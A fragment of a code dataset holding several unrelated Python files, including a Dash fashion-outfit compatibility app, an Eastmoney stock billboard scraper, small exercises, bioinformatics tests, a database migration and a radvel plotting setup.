methods=[\"GET\", \"POST\"])\ndef create_note():\n if request.method == \"GET\":\n return render_template((\"notes/create_note.html\"))\n else:\n title = request.form[\"title\"]\n body = request.form[\"body\"]\n note = Note(title=title, body=body)\n note.save()\n return redirect(url_for(\".create_note\"))\n\n@notes_api.route(\"/notes\", methods=[\"GET\"])\ndef notes():\n notes = Note.objects\n return render_template(\"notes/notes.html\", notes=notes)","sub_path":"controllers/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"262264407","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport base64\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport io\nimport random\nimport time\nimport os\nimport json\nimport sys\nimport torch\nimport re\n\nsys.path.insert(0, \"../mcn\")\nimport torchvision.transforms as transforms\nfrom model import CompatModel\nfrom utils import prepare_dataloaders\nfrom PIL import Image\n\ntrain_dataset, _, _, _, test_dataset, _ = prepare_dataloaders(num_workers=1)\n# Load pretrained weights\ndevice = torch.device('cpu')\n# print(len(.vocabulary)) # 2757\nmodel = CompatModel(embed_size=1000, need_rep=True, vocabulary=2757).to(device)\nmodel.load_state_dict(torch.load(\"../mcn/model_train_relation_vse_type_cond_scales.pth\", map_location=\"cpu\"))\nmodel.eval()\nfor name, param in model.named_parameters():\n if 'fc' not in name:\n param.requires_grad = False\n\ndef defect_detect(img, model, normalize=True):\n # Register hook for comparison matrix\n relation = None\n\n def func_r(module, grad_in, grad_out):\n nonlocal relation\n relation = grad_in[1].detach()\n\n for name, module in model.named_modules():\n if name == 'predictor.0':\n module.register_backward_hook(func_r)\n # Forward\n out = model._compute_score(img)\n out = out[0]\n\n # Backward\n one_hot = torch.FloatTensor([[-1]]).to(device)\n model.zero_grad()\n out.backward(gradient=one_hot, retain_graph=True)\n\n if normalize:\n relation = relation / (relation.max() - relation.min())\n relation += 1e-3\n return relation, out.item()\n\ndef item_diagnosis(relation, select):\n \"\"\" Output the most incompatible item in the outfit\n \n Return:\n result (list): Diagnosis value of each item \n order (list): The indices of items ordered by its importance\n \"\"\"\n mats = 
vec2mat(relation, select)\n for m in mats:\n mask = torch.eye(*m.shape).byte()\n m.masked_fill_(mask, 0)\n result = torch.cat(mats).sum(dim=0)\n order = [i for i, j in sorted(enumerate(result), key=lambda x:x[1], reverse=True)]\n return result, order\n\ndef vec2mat(relation, select):\n \"\"\" Convert relation vector to 4 matrix, which is corresponding to 4 layers\n in the backend CNN.\n \n Args:\n relation: (np.array | torch.tensor) of shpae (60,)\n select: List of select item indices, e.g. (0, 2, 3) means select 3 items\n in total 5 items in the outfit.\n \n Return:\n mats: List of matrix\n \"\"\"\n mats = []\n for idx in range(4):\n mat = torch.zeros(5, 5)\n mat[np.triu_indices(5)] = relation[15*idx:15*(idx+1)]\n mat += torch.triu(mat, 1).transpose(0, 1)\n mat = mat[select, :]\n mat = mat[:, select]\n mats.append(mat)\n return mats\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nroot = \"/home/wangx/fashion_compatibility_mcn/data\"\nroot = \"/mnt/iusers01/fatpou01/matsci01/t80083xw/scratch/fashion_compatibility_mcn/data\"\nimg_root = os.path.join(root, \"images\")\njson_file = os.path.join(root, \"test_no_dup_with_category_3more_name.json\")\n\njson_data = json.load(open(json_file))\n\ntop_options, bottom_options, shoe_options, bag_options, accessory_options = [], [], [], [], []\nprint(\"Load options...\")\nfor cnt, (iid, outfit) in enumerate(json_data.items()):\n if cnt > 10:\n break\n if \"upper\" in outfit:\n label = os.path.join(iid, str(outfit['upper']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n top_options.append({'label': label, 'value': value})\n if \"bottom\" in outfit:\n label = os.path.join(iid, str(outfit['bottom']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n bottom_options.append({'label': label, 'value': value})\n if \"shoe\" in outfit:\n label = os.path.join(iid, str(outfit['shoe']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n shoe_options.append({'label': label, 'value': value})\n if \"bag\" in outfit:\n label = os.path.join(iid, str(outfit['bag']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n bag_options.append({'label': label, 'value': value})\n if \"accessory\" in outfit:\n label = os.path.join(iid, str(outfit['accessory']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n accessory_options.append({'label': label, 'value': value})\n\n\napp.layout = html.Div([\n html.H1(\"Fashion Outfit Diagnosis\", style={\n \"margin\": \"0.5em 1em 0.5em 1em\"\n }),\n html.Div([\n html.Div([\n html.H4(children=\"Top\"),\n dcc.Dropdown(\n id='top',\n options=top_options,\n value=random.choice(top_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-top\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"bottom\"),\n dcc.Dropdown(\n id='bottom',\n options=bottom_options,\n value=random.choice(bottom_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-bottom\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", 
\"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"shoe\"),\n dcc.Dropdown(\n id='shoe',\n options=shoe_options,\n value=random.choice(shoe_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-shoe\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"bag\"),\n dcc.Dropdown(\n id='bag',\n options=bag_options,\n value=random.choice(bag_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-bag\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"accessory\"),\n dcc.Dropdown(\n id='accessory',\n options=accessory_options,\n value=random.choice(accessory_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-accessory\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Button(id='submit-button', n_clicks=0, children='Submit', style={\n \"margin\": \"1.5em\"\n }),\n ], style={\n \"display\": \"inline-block\",\n \"vertical-align\": \"top\",\n \"width\": \"35%\",\n \"border\": \"1px solid black\",\n \"border-radius\": \"5px\",\n }),\n html.Div([\n html.Div(id=\"input-state\", children=[\n html.H4(children=\"Current outfit\"),\n html.Img(id='top-img', style={\"max-height\":\"150px\", \"margin\":\"5px\"}),\n html.Img(id='bottom-img', style={\"max-height\":\"150px\", \"margin\": \"5px\"}),\n html.Img(id='shoe-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n html.Img(id='bag-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n html.Img(id='accessory-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n ]),\n html.Div(id=\"output-state\")\n ], style={\n \"display\": \"inline-block\",\n \"vertical-align\": \"top\",\n \"width\": \"60%\",\n \"margin\": \"1em 1em 1em 1em\",\n })\n])\n\n@app.callback(\n Output('top-img', 'src'),\n [Input('top', 'value'), Input('upload-top', 'contents')],\n [State('upload-top', 'filename'),\n State('upload-top', 'last_modified')])\ndef update_top(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('bottom-img', 'src'),\n [Input('bottom', 'value'), Input('upload-bottom', 'contents')],\n [State('upload-bottom', 'filename'),\n State('upload-bottom', 'last_modified')])\ndef update_bottom(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 
'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('shoe-img', 'src'),\n [Input('shoe', 'value'), Input('upload-shoe', 'contents')],\n [State('upload-shoe', 'filename'),\n State('upload-shoe', 'last_modified')])\ndef update_shoe(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('bag-img', 'src'),\n [Input('bag', 'value'), Input('upload-bag', 'contents')],\n [State('upload-bag', 'filename'),\n State('upload-bag', 'last_modified')])\ndef update_bag(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('accessory-img', 'src'),\n [Input('accessory', 'value'), Input('upload-accessory', 'contents')],\n [State('upload-accessory', 'filename'),\n State('upload-accessory', 'last_modified')])\ndef update_accessory(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(Output('output-state', 'children'),\n [Input('submit-button', 'n_clicks')],\n [State('top-img', 'src'),\n State('bottom-img', 'src'),\n State('shoe-img', 'src'),\n State('bag-img', 'src'),\n State('accessory-img', 'src')])\ndef update_output(n_clicks, top, bottom, shoe, bag, accessory):\n if n_clicks > 0:\n img_dict = {\n \"top\": top.split(',')[1],\n \"bottom\": bottom.split(',')[1],\n \"shoe\": shoe.split(',')[1],\n \"bag\": bag.split(',')[1],\n \"accessory\": accessory.split(',')[1]\n }\n img_tensor = base64_to_tensor(img_dict)\n img_tensor.unsqueeze_(0)\n relation, score = defect_detect(img_tensor, model)\n relation = relation.squeeze()\n result, order = item_diagnosis(relation, select=[0, 1, 2, 3, 4])\n best_score, best_img_path = retrieve_sub(img_tensor, [0, 1, 2, 3, 4], order)\n\n out = [html.H4(children=\"Revised Outfit\"), html.H4(children=\"Score: {:.4f}\".format(score)), html.H4(children=\"Revised Score: {:.4f}\".format(best_score))]\n\n for part in [\"top\", \"bottom\", \"shoe\", \"bag\", \"accessory\"]:\n if part in best_img_path.keys():\n fname = best_img_path[part]\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n src= 
'data:image/png;base64,{}'.format(encoded_img.decode())\n            else:\n                src = locals()[part]\n            out.append(html.Img(id='{}-img-new'.format(part), style={\"max-height\":\"150px\", \"margin\":\"5px\"}, src=src))\n\n        return out\n\ndef retrieve_sub(x, select, order):\n    \"\"\" Retrieve the dataset to substitute the worst item for the best choice.\n    \"\"\"\n    all_names = {0:'upper', 1:'bottom', 2:'shoe', 3:'bag', 4:'accessory'}\n    try_most = 20\n    \n    best_score = -1\n    best_img_path = dict()\n\n    for o in order:\n        if best_score > 0.9:\n            break\n        problem_part_idx = select[o]\n        problem_part = all_names[problem_part_idx]\n        for outfit in random.sample(test_dataset.data, try_most):\n            if best_score > 0.9:\n                break\n            if problem_part in outfit[1]:\n                img_path = os.path.join(test_dataset.root_dir, outfit[0], str(outfit[1][problem_part]['index'])) + '.jpg'\n                img = Image.open(img_path).convert('RGB')\n                img = test_dataset.transform(img).to(device)\n                x[0][problem_part_idx] = img\n                with torch.no_grad():\n                    out = model._compute_score(x)\n                score = out[0]\n                if score.item() > best_score:\n                    best_score = score.item()\n                    best_img_path[problem_part] = img_path\n        x[0][problem_part_idx] = test_dataset.transform(Image.open(best_img_path[problem_part]).convert('RGB')).to(device)\n        \n        print('problem_part: {}'.format(problem_part))\n        print('best substitution: {} {}'.format(problem_part, best_img_path[problem_part]))\n        print('After substitution the score is {:.4f}'.format(best_score))\n    return best_score, best_img_path\n\ndef base64_to_tensor(image_bytes_dict):\n    my_transforms = transforms.Compose([\n        transforms.Resize((224, 224)),\n        transforms.ToTensor(),\n    ])\n    outfit_tensor = []\n    for k, v in image_bytes_dict.items():\n        img = base64_to_image(v)\n        tensor = my_transforms(img)\n        outfit_tensor.append(tensor.squeeze())\n    outfit_tensor = torch.stack(outfit_tensor)\n    outfit_tensor = outfit_tensor.to(device)\n    return outfit_tensor\n\ndef base64_to_image(base64_str):\n    base64_data = re.sub('^data:image/.+;base64,', '', base64_str)\n    byte_data = base64.b64decode(base64_data)\n    image_data = io.BytesIO(byte_data)\n    img = Image.open(image_data)\n    return img\n\nif __name__ == \"__main__\":\n    app.run_server(debug=True, host='0.0.0.0')\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"50626649","text":"# -*- coding: utf-8 -*-\r\n# Scraper for the Eastmoney \"Dragon-Tiger List\" (longhubang, LHB) daily billboard\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scrapy import Selector\r\nimport urllib\r\nimport urllib.request\r\nimport urllib.error\r\nimport datetime, time\r\nimport re\r\n\r\n\r\ndef dateRange(start, end, step=1, format=\"%Y-%m-%d\"):\r\n    strptime, strftime = datetime.datetime.strptime, datetime.datetime.strftime\r\n    days = (strptime(end, format) - strptime(start, format)).days \r\n    return [strftime(strptime(start, format) + datetime.timedelta(i), format) for i in range(0, days +1 , step)]\r\n    \r\ndef Get_LHB_stocks_from_excel(begin_date, end_date):\r\n
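    # For every trading day in [begin_date, end_date], fetch that day's
    # billboard JSON, keep the detail columns, and add a Wind-style code
    # (zero-padded 6 digits plus .SH/.SZ) per stock; empty days are skipped.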
    Timeline = dateRange(begin_date, end_date)\r\n    dfs = pd.DataFrame()\r\n    for date_id in Timeline:\r\n#        print( 'Date: ', date_id )\r\n        URL_stocks_infos = r'http://data.eastmoney.com/DataCenter_V3/stock2016/TradeDetail/pagesize=200,page=1,sortRule=-1,sortType=,startDate='+ date_id + ',endDate=' + date_id + ',gpfw=0,js=var%20data_tab_1.html?rt=26442172'\r\n        html = urllib.request.urlopen(URL_stocks_infos).read()\r\n        html = html.decode('gb2312','ignore')\r\n        X = re.split( ',\"url\"' , html )[0]\r\n        X = re.split( '\"data\":' , X )[1] \r\n        df = pd.read_json( X , orient='records')\r\n        if(len(df) != 0 ):\r\n            df2 = df[['Tdate', 'SCode', 'SName','JD','ClosePrice', 'Chgradio', 'JmMoney', 'Bmoney', \\\r\n                      'Smoney', 'ZeMoney', 'Turnover', 'JmRate', 'ZeRate', 'Dchratio', 'Ltsz', 'Ctypedes' ]]\r\n            colunms_name = ['Code', 'Name', '解读', '收盘价', '涨跌幅', '龙虎榜净买额', '龙虎榜买入额', '龙虎榜卖出额', \\\r\n                            '龙虎榜成交额', '市场总成交额', '净买额占总成交比', '成交额占比' , '换手率', '流通市值', '上榜原因']\r\n            df2 = df2.rename( columns = {'Tdate': 'Date', 'SCode': colunms_name[0], 'SName':colunms_name[1], 'JD': colunms_name[2], 'ClosePrice': colunms_name[3] , \\\r\n                                         'Chgradio': colunms_name[4], 'JmMoney': colunms_name[5], 'Bmoney': colunms_name[6], \\\r\n                                         'Smoney':colunms_name[7], 'ZeMoney':colunms_name[8], 'Turnover':colunms_name[9], 'JmRate':colunms_name[10], \\\r\n                                         'ZeRate':colunms_name[11], 'Dchratio':colunms_name[12], 'Ltsz':colunms_name[13], 'Ctypedes':colunms_name[14] } )\r\n            df2['Wind_Code'] = str( df2['Code'] )\r\n            S_codes = list() \r\n            for i in df2['Code']:\r\n                if( len( str(i) ) <6 ):\r\n                    s = '0'*(6-len( str(i) )) + str(i)\r\n                else:\r\n                    s = str(i)\r\n                if(s[0] == '6'):\r\n                    s = s+'.SH'\r\n                else:\r\n                    s = s+'.SZ'\r\n                if( len(S_codes) ==0 ):\r\n                    S_codes = [s]\r\n                else:\r\n                    S_codes.append(s)\r\n            df2['Wind_Code'] = S_codes\r\n            print( 'Date: ', date_id, 'entries on the list: ', len(df2), ', distinct listed stocks: ', len( df2['Wind_Code'].unique() ) )\r\n            dfs = dfs.append(df2)\r\n        else:\r\n            print( 'Date: ', date_id, 'entries on the list: ', 0, ', distinct listed stocks: ', 0 )\r\n    return dfs\r\n\r\ndef Crawl_web(code, date):\r\n    url = 'http://data.eastmoney.com/stock/lhb,'+ date +','+ code[0:6] +'.html'\r\n    ########\r\n    content = urllib.request.urlopen(url).read()\r\n    content = content.decode('gb2312','ignore')\r\n    sel = Selector(text = content).xpath('//div[@class=\"data-tips\"]//div[@class=\"left con-br\"]//text()').extract()\r\n    Table_datas = pd.DataFrame()\r\n    for i in range(len(sel)):\r\n        s_type = sel[i].split('类型:')[1]\r\n        data1 = Selector(text = content).xpath('//div[@class=\"data-tips\"]//div[@class=\"right\"]//span//text()').extract()\r\n        P_close = data1[0]\r\n        Rtn = data1[1]\r\n        ###################\r\n        links_table_buy = Selector(text = content).xpath('//div[@class=\"content-sepe\"]//table[@class=\"default_tab stock-detail-tab\"]//tbody')\r\n        links_table_sell = Selector(text = content).xpath('//div[@class=\"content-sepe\"]//table[@class=\"default_tab tab-2\"]//tbody')\r\n        ####################\r\n        List_buy_top, Table_data_buy = HTML_Parse( [links_table_buy[i]] )\r\n        Table_data_buy['ID'] = 'top_buy'\r\n        List_sell_top, Table_data_sell = HTML_Parse( [links_table_sell[i]] )\r\n        Table_data_sell['ID'] = 'top_sell'\r\n        Table_data = pd.concat( [Table_data_buy, Table_data_sell], ignore_index=True)\r\n        Table_data['Code'] = code\r\n        Table_data['Date'] = date\r\n        Table_data['Type'] = s_type\r\n        Table_data['P_close'] = P_close\r\n        Table_data['Rtn'] = Rtn\r\n        Table_datas = Table_datas.append(Table_data)\r\n    if(len(Table_datas)>0):\r\n
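        # Normalize the column order before returning; main() writes these
        # frames straight to Excel and relies on this exact layout.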
        Table_datas = Table_datas[['Code', 'Date', 'Type', 'P_close', 'Rtn', 'ID', 'sec_name', 'amt_buy', 'amt_sell' ]]\r\n    return Table_datas \r\n\r\ndef HTML_Parse(links_tables):\r\n    List = [] \r\n    for ind, link_table in enumerate(links_tables):\r\n        links = link_table.xpath('.//tr') \r\n        for ind2, link2 in enumerate(links):\r\n            sc_name = link2.xpath('.//td//div[@class=\"sc-name\"]//a//text()').extract()\r\n            if( len(sc_name) >0):\r\n                Amt_buy = link2.xpath('.//td[@style=\"color:red\"]//text()').extract()\r\n                Amt_sell = link2.xpath('.//td[@style=\"color:Green\"]//text()').extract()\r\n                if(len(Amt_buy)>0):\r\n                    Amt_buy = Amt_buy[0]\r\n                else:\r\n                    Amt_buy = np.nan\r\n                if(len(Amt_sell)>0):\r\n                    Amt_sell = Amt_sell[0]\r\n                else:\r\n                    Amt_sell = np.nan \r\n#                print(sc_name, Amt_buy, Amt_sell)\r\n                List.append([sc_name[0], Amt_buy, Amt_sell])\r\n    table_data = pd.DataFrame(List)\r\n    table_data = table_data.rename(columns = {0:'sec_name', 1:'amt_buy', 2:'amt_sell'})\r\n    return List, table_data\r\n\r\ndef main(begin_date, end_date):\r\n    Stocks_info = Get_LHB_stocks_from_excel(begin_date, end_date)\r\n    Timeline_unique = np.unique(Stocks_info['Date']) \r\n    for date in Timeline_unique:\r\n        Table_datas = pd.DataFrame() \r\n        CODES = Stocks_info[Stocks_info['Date'] == date]['Wind_Code'].unique()\r\n        for code in CODES: \r\n            df = [] \r\n            print('Downloading ......', code, date)\r\n            df = Crawl_web(code, date) \r\n            repeat_times = 1 \r\n            while(len(df) == 0 and repeat_times <= 10 ):\r\n                print('...... result length is 0, retrying ...... ', code, date)\r\n                time.sleep(60*3)\r\n                df = Crawl_web(code, date) \r\n                if(len(df)>0):\r\n                    print('Successful download ......', code, date)\r\n                repeat_times = repeat_times + 1\r\n            Table_datas = Table_datas.append(df) \r\n        str_result_filename = \"./data/龙虎榜具体信息_\"+ str( min(Table_datas['Date'])) + '_'+ str( max(Table_datas['Date'])) + \".xlsx\"\r\n        writer = pd.ExcelWriter(str_result_filename) \r\n        Table_datas.to_excel(writer, sheet_name = 'LHB' , index=False) \r\n        writer.save() \r\n    ##########################\r\n    str_result_filename = \"./龙虎榜综合信息_\"+ str( min(Stocks_info['Date'])) + '_'+ str( max(Stocks_info['Date'])) + \".xlsx\"\r\n    writer = pd.ExcelWriter(str_result_filename) \r\n    Stocks_info.to_excel(writer, sheet_name = '龙虎榜日综合数据' , index=False) \r\n    writer.save()\r\n    return 0 \r\n    \r\n########### main function ######################## \r\nif __name__ == '__main__': \r\n    begin_date = '2019-12-01' \r\n    end_date = '2019-12-31' \r\n#    Stocks_info = Get_LHB_stocks_from_excel(begin_date, end_date) \r\n    main(begin_date, end_date) \r\n\r\n\r\n\r\n","sub_path":"Update_Download_LHB_from_DFCF.py","file_name":"Update_Download_LHB_from_DFCF.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522286844","text":"string1=\"Alegria\"\r\n\r\ndef anagrama(string1,Anagram):\r\n    string1=string1.lower()\r\n    Anagram=Anagram.lower()\r\n    for i in string1:\r\n        if Anagram.find(i) == -1 or Anagram.count(i) != string1.count(i):\r\n            res=\"Not an anagram\"\r\n            break\r\n        else:\r\n            res=\"Is an anagram\"\r\n    return res\r\n\r\nprint(anagrama(string1,\"geleira\"))\r\n\r\n","sub_path":"Cap6/Cap6_exos_ficha/Ex 5..py","file_name":"Ex 5..py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
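# A note on the anagram check above: scanning with find/count is quadratic in
# the string length, and it misses the case where Anagram has extra letters
# beyond string1's (e.g. anagrama("ab", "abc")). A hypothetical equivalent
# (not part of the original file) compares multiset letter counts instead:
#
#     from collections import Counter
#
#     def is_anagram(a, b):
#         # Counter builds a letter -> occurrence map; two strings are
#         # anagrams exactly when those maps are equal, which also rules
#         # out strings of different length.
#         return Counter(a.lower()) == Counter(b.lower())
#
#     print(is_anagram("Alegria", "geleira"))  # False: letter counts differ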
 +{"seq_id":"255842711","text":"from nose.tools import raises, eq_\n\nfrom mhctools import NetMHC, NetMHC3, NetMHC4\nfrom mhctools.alleles import normalize_allele_name\n\n\ndef run_class_with_executable(mhc_class, mhc_executable):\n    alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n    predictor = mhc_class(\n        alleles=alleles,\n        epitope_lengths=[9],\n        program_name=mhc_executable)\n    fasta_dictionary = {\n        \"SMAD4-001\": \"ASIINFKELA\",\n        \"TP53-001\": \"ASILLLVFYW\"\n    }\n    epitope_collection = predictor.predict(\n        fasta_dictionary=fasta_dictionary)\n\n@raises(SystemError)\ndef test_executable_mismatch_3_4():\n    run_class_with_executable(NetMHC3, \"netMHC\")\n\n@raises(SystemError)\ndef test_executable_mismatch_4_3():\n    run_class_with_executable(NetMHC4, \"netMHC-3.4\")\n\ndef test_wrapper_function():\n    alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n    wrapped_4 = NetMHC(alleles=alleles,\n                       epitope_lengths=[9],\n                       program_name=\"netMHC\")\n    eq_(type(wrapped_4), NetMHC4)\n    wrapped_3 = NetMHC(alleles=alleles,\n                       epitope_lengths=[9],\n                       program_name=\"netMHC-3.4\")\n    eq_(type(wrapped_3), NetMHC3)\n\n@raises(SystemError)\ndef test_wrapper_failure():\n    alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n    NetMHC(alleles=alleles,\n           epitope_lengths=[9],\n           program_name=\"netMHC-none\")\n","sub_path":"test/test_netmhc_version.py","file_name":"test_netmhc_version.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49246430","text":"# Intentionally raising an error.\n\n# A calculator program that only allows division of single-digit numbers.\ntry:\n    print(\"This calculator divides single-digit numbers only.\")\n    num1 = int(input(\"Please enter the first number : \"))\n    num2 = int(input(\"Please enter the second number : \"))\n    if num1 >= 10 or num2 >= 10: # raising an error on a specific condition makes the except block run\n        raise ValueError\n    print(\"{0} / {1} = {2}\".format(num1, num2, int(num1/num2)))\nexcept ValueError:\n
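    # Both a non-numeric int() conversion above and the explicit raise land here.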
    print(\"Invalid input. Please enter single-digit numbers only.\") ","sub_path":"files/exceptionPy/generateError.py","file_name":"generateError.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"358263500","text":"\"\"\"empty message\n\nRevision ID: 468f4d9b6b05\nRevises: d5db53144449\nCreate Date: 2020-01-15 12:59:34.655925\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '468f4d9b6b05'\ndown_revision = 'd5db53144449'\nbranch_labels = None\ndepends_on = None\n\n# Table for data migration\nsample = sa.sql.table('sample', sa.Column('name', sa.Text()))\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('sample', sa.Column('name', sa.Text(), nullable=True))\n    # ### end Alembic commands ###\n    # Update existing rows with default value for name\n    op.execute(sample.update().values({\"name\": \"Unknown\"}))\n    op.alter_column('sample', 'name', existing_type=sa.TEXT(), nullable=False)\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('sample', 'name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/468f4d9b6b05_.py","file_name":"468f4d9b6b05_.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409877344","text":"\"\"\"\nenv: py37_emcee2\n\"\"\"\n\nimport radvel\nfrom radvel import driver\nfrom radvel.plot import orbit_plots, mcmc_plots\nfrom radvel.mcmc import statevars\nfrom radvel import plot\nfrom radvel.utils import t_to_phase, fastbin, sigfig\nfrom radvel.driver import load_status, save_status\nimport configparser, os, emcee\n\nimport numpy as np\nimport matplotlib\nfrom matplotlib import rcParams, gridspec\nfrom matplotlib import pyplot as plt\nfrom matplotlib.cm import nipy_spectral\nfrom matplotlib.ticker import MaxNLocator\nfrom matplotlib.offsetbox import AnchoredText\nfrom astropy.time import Time\n\nfrom astropy import units as units, constants as const\n\n##########\n# config #\n##########\nlatex = {\n 'ms': r'm s$^{\\mathregular{-1}}$',\n 'BJDTDB': r'BJD$_{\\mathregular{TDB}}$'\n}\n\ntelfmts_default = {\n 'j': dict(color='C2', marker=u'o', label='HIRES', mew=1),\n 'k': dict(color='k', fmt='s', mfc='none', label='HIRES pre 2004', mew=1),\n 'a': dict(color='g', fmt='d', label='APF'),\n 'pfs': dict(color='magenta', fmt='p', label='PFS'),\n 'CORALIE': dict(color='C0', fmt='d', label='CORALIE'),\n 'h': dict(color='C1', fmt=\"s\", label='HARPS'),\n 'harps-n': dict(color='firebrick', fmt='^', label='HARPS-N'),\n 'l': dict(color='g', fmt='*', label='LICK'),\n}\ntelfmts_default['lick'] = telfmts_default['l']\ntelfmts_default['hires_rj'] = telfmts_default['j']\ntelfmts_default['hires'] = telfmts_default['j']\ntelfmts_default['hires_rk'] = telfmts_default['k']\ntelfmts_default['apf'] = telfmts_default['a']\ntelfmts_default['harps'] = telfmts_default['h']\ntelfmts_default['LICK'] = telfmts_default['l']\ntelfmts_default['HIRES_RJ'] = telfmts_default['j']\ntelfmts_default['HIRES'] = telfmts_default['j']\ntelfmts_default['HIRES_RK'] = telfmts_default['k']\ntelfmts_default['APF'] = telfmts_default['a']\ntelfmts_default['HARPS'] = telfmts_default['h']\ntelfmts_default['HARPS-N'] = telfmts_default['harps-n']\ntelfmts_default['PFS'] = telfmts_default['pfs']\n\n\ncmap = nipy_spectral\nrcParams['font.size'] = 9\nrcParams['lines.markersize'] = 3.5\nrcParams['axes.grid'] = False\ndefault_colors = ['orange', 'purple', 'magenta', 